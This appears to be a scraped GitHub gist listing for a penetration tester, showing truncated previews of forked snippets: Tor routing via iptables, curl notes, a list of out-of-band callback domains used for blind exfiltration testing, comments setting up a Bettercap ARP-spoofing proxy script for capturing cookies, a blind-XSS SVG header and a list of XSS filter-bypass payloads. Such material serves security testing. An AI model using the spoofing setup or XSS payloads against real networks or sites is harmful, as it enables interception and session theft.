Christopher CalfCrusher

## readme.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / readme.md
            
            
              Created
              October 22, 2022 00:33
                — forked from sohlich/readme.md
            
              
                Let's encrypt - generate SSL certificate manually via Cerbot DNS Challenge
              
          
    Install Certbot

OSX

$ brew install certbot
Linux


## route-all-traffic-through-tor.md

      
              3 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / route-all-traffic-through-tor.md
            
            
              Created
              October 25, 2022 18:30
                — forked from numb95/route-all-traffic-through-tor.md
            
              
                Route all internet traffic through Tor
              
          
    Do not use in production Server or if you don't know what iptables do

Add this to torrc ( located on /etc/tor/torrc):
VirtualAddrNetwork 10.192.0.0/10

AutomapHostsOnResolve 1

TransPort 9051 


## tor.sh
#!/usr/bin/env bash

# 'Wi-Fi' or 'Ethernet' or 'Display Ethernet'
INTERFACE=Wi-Fi

# Ask for the administrator password upfront
sudo -v

# Keep-alive: update existing `sudo` time stamp until finished
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &

## route-traffic-through-tor-iptables.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / route-traffic-through-tor-iptables.md
            
            
              Created
              October 25, 2022 18:33
                — forked from jkullick/route-traffic-through-tor-iptables.md
            
              
                Route all Traffic through Tor for specific User on Linux with IPTables
              
          
    iptables -A OUTPUT -p icmp -j REJECT
iptables -t nat -A OUTPUT ! -o lo -p tcp -m owner --uid-owner $USER -m tcp -j REDIRECT --to-ports 9040
iptables -t nat -A OUTPUT ! -o lo -p udp -m owner --uid-owner $USER -m udp --dport 53 -j REDIRECT --to-ports 53
iptables -t filter -A OUTPUT -p tcp -m owner --uid-owner $USER -m tcp --dport 9040 -j ACCEPT
iptables -t filter -A OUTPUT -p udp -m owner --uid-owner $USER -m udp --dport 53 -j ACCEPT
iptables -t filter -A OUTPUT ! -o lo -m owner --uid-owner $USER -j DROP

  
## Out of band interaction domains
interact.sh
oast.pro
oast.live
oast.site
oast.online
oast.fun
oast.me
burpcollaborator.net
oastify.com
canarytokens.com

## curl.md

      
              5 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / curl.md
            
            
              Created
              November 10, 2022 08:48
                — forked from subfuzion/curl.md
            
              
                curl POST examples
              
          
    Common Options

-#, --progress-bar
Make curl display a simple progress bar instead of the more informational standard meter.
-b, --cookie <name=data>
Supply cookie with request. If no =, then specifies the cookie file to use (see -c).
-c, --cookie-jar <file name>
File to save response cookies to.

  
## responder-n-cookies.js
// Code mashed together from here: https://github.com/bettercap/caplets/
// Intended to use with Bettercap v2: https://github.com/bettercap/bettercap
//
// net.probe on
// sleep 1
// net.probe off
// set arp.spoof.targets <TARGETS>
// set https.proxy.script /root/caplets/responder-n-cookies.js
// set http.proxy.script /root/caplets/responder-n-cookies.js
// https.proxy on

## Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
  "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  <svg width="200"
       height="200"
       zoomAndPan="disable"
       xmlns="http://www.w3.org/2000/svg"
       xmlns:xlink="http://www.w3.org/1999/xlink"
       xml:space="preserve">

## xss-image.svg

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                CalfCrusher
                / xss-image.svg
            
            
              Created
              January 10, 2023 14:38
                — forked from rudSarkar/xss-image.svg
            
              
                SVG Image XSS File
              
          
      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## gist:55e1505e027b48dc5de41e9f65a8069b
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
	#!/usr/bin/env bash

	# 'Wi-Fi' or 'Ethernet' or 'Display Ethernet'
	INTERFACE=Wi-Fi

	# Ask for the administrator password upfront
	sudo -v

	# Keep-alive: update existing `sudo` time stamp until finished
	while true; do sudo -n true; sleep 60; kill -0 "$$" \|\| exit; done 2>/dev/null &
	interact.sh
	oast.pro
	oast.live
	oast.site
	oast.online
	oast.fun
	oast.me
	burpcollaborator.net
	oastify.com
	canarytokens.com
	// Code mashed together from here: https://github.com/bettercap/caplets/
	// Intended to use with Bettercap v2: https://github.com/bettercap/bettercap
	//
	// net.probe on
	// sleep 1
	// net.probe off
	// set arp.spoof.targets <TARGETS>
	// set https.proxy.script /root/caplets/responder-n-cookies.js
	// set http.proxy.script /root/caplets/responder-n-cookies.js
	// https.proxy on
	<?xml version="1.0" standalone="no"?>
	<!DOCTYPE svg PUBLIC
	"-//W3C//DTD SVG 1.1//EN"
	"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
	<svg width="200"
	height="200"
	zoomAndPan="disable"
	xmlns="http://www.w3.org/2000/svg"
	xmlns:xlink="http://www.w3.org/1999/xlink"
	xml:space="preserve">
	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>